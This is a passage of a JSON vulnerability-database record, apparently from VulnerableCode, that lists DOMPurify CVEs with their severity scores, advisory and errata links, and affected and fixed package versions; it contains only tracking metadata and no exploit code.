cores":[],"url":"https://access.redhat.com/errata/RHSA-2025:22284"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:8544","reference_id":"RHSA-2025:8544","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:8544"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:8551","reference_id":"RHSA-2025:8551","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:8551"}],"fixed_packages":[{"url"
:"http://public2.vulnerablecode.io/api/packages/371910?format=json","purl":"pkg:npm/dompurify@2.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.2"}],"aliases":["CVE-2024-48910","GHSA-p3vf-v8qc-cwcr"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wmjr-1h3n-hbhb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20937?format=json","vulnerability_id":"VCID-z8n7-dz6p-zqfb","summary":"","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47875.json","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47875.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47875","reference_id":"","reference_type":"","scores":[{"value":"0.00699","scoring_system":"epss","scoring_elements":"0.72542","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00699","scoring_system":"epss","scoring_elements":"0.72547","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00699","scoring_system":"epss","scoring_elements":"0.72532","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00699","scoring_system":"epss","scoring_elements":"0.72455","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47875"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47875","refer
ence_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47875"},{"reference_url":"http://seclists.org/fulldisclosure/2025/Apr/14","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://seclists.org/fulldisclosure/2025/Apr/14"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/0ef5e537a514f904b6aa1d7ad9e749e365d7185f","reference_id":"0ef5e537a514f904b6aa1d7ad9e749e365d7185f","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH
","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/0ef5e537a514f904b6aa1d7ad9e749e365d7185f"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1084983","reference_id":"1084983","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1084983"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2318052","reference_id":"2318052","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2318052"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a","reference_id":"6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47875","reference_id":"CVE-2024-47875","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47875"},{"reference_url":"https://github.com/advisories/GHSA-gx9m-whjm-85jf","reference_id":"GHSA-gx9m-whjm-85jf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gx9m-whjm-85jf"},{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-gx9m-whjm-85jf","reference_id":"GHSA-gx9m-whjm-85jf","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/"}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-gx9m-whjm-85jf"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10236","reference_id":"RHSA-2024:10236","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:10236"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10988","reference_id":"RHSA-2024:10988","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:10988"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8327","reference_id":"RHSA-2024:8327","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8327"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8678","reference_id":"RHSA-2024:8678","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8678"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8683","reference_id":"RHSA-2024:8683","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8683"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8981","reference_id":"RHSA-2024:8981","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8981"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8991","reference_id":"RHSA-2024:8991","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8991"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9473","reference_id":"RHSA-2024:9473","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9473"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9620","reference_id":"RHSA-2024:9620","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9620"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9629","reference_id":"RHSA-2024:9629","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9629"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0329","reference_id":"RHSA-2025:0329","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0329"},{"reference_url":"https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098","reference_id":"test-suite.js#L2098","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/"}],"url":"https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33800?format=json","purl":"pkg:npm/dompurify@2.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.0"},{"url":"http://public2.vulnerablecode.io/api/packages/33396?format=json","purl":"pkg:npm/dompurify@3.1.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-cv62-a95x-9uhe"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-r6b8-q386-3ken"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.3"}],"aliases":["CVE-2024-47875","GHSA-gx9m-whjm-85jf"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z8n7-dz6p-zqfb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/23368?format=json","vulnerability_id":"VCID-zaud-3sc4-ykcg","summary":"","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-26791.json","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-26791.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-26791","reference_id":"","reference_type":"","scores":[{"value":"0.00168","scoring_system":"epss","scoring_elements":"0.37901","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00168","scoring_system":"epss","scoring_elements":"0.37914","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00168","scoring_system":"epss","scoring_elements":"0.37888","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00168","scoring_system":"epss","scoring_elements":"0.37711","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-26791"},{"reference_url":"https://ensy.zip/posts/dompurify-323-bypass","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://ensy.zip/posts/dompurify-323-bypass"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://nsysean.github.io/posts/dompurify-323-bypass","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nsysean.github.io/posts/dompurify-323-bypass"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-26791","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-26791"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1098325","reference_id":"1098325","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1098325"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2345695","reference_id":"2345695","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2345695"},{"reference_url":"https://github.com/cure53/DOMPurify/releases/tag/3.2.4","reference_id":"3.2.4","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/"}],"url":"https://github.com/cure53/DOMPurify/releases/tag/3.2.4"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/d18ffcb554e0001748865da03ac75dd7829f0f02","reference_id":"d18ffcb554e0001748865da03ac75dd7829f0f02","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/d18ffcb554e0001748865da03ac75dd7829f0f02"},{"reference_url":"https://ensy.zip/posts/dompurify-323-bypass/","reference_id":"dompurify-323-bypass","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/"}],"url":"https://ensy.zip/posts/dompurify-323-bypass/"},{"reference_url":"https://nsysean.github.io/posts/dompurify-323-bypass/","reference_id":"dompurify-323-bypass","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/"}],"url":"https://nsysean.github.io/posts/dompurify-323-bypass/"},{"reference_url":"https://github.com/advisories/GHSA-vhxf-7vqr-mrjg","reference_id":"GHSA-vhxf-7vqr-mrjg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vhxf-7vqr-mrjg"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:10020","reference_id":"RHSA-2025:10020","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:10020"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:1875","reference_id":"RHSA-2025:1875","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:1875"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:2518","reference_id":"RHSA-2025:2518","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:2518"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:3368","reference_id":"RHSA-2025:3368","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:3368"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:3397","reference_id":"RHSA-2025:3397","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:3397"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:3886","reference_id":"RHSA-2025:3886","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:3886"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:7626","reference_id":"RHSA-2025:7626","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:7626"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:2737","reference_id":"RHSA-2026:2737","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:2737"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:2769","reference_id":"RHSA-2026:2769","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:2769"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3406","reference_id":"RHSA-2026:3406","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3406"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377348?format=json","purl":"pkg:npm/dompurify@3.2.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-cv62-a95x-9uhe"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-r6b8-q386-3ken"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.4"}],"aliases":["CVE-2025-26791","GHSA-vhxf-7vqr-mrjg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zaud-3sc4-ykcg"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.4.3"}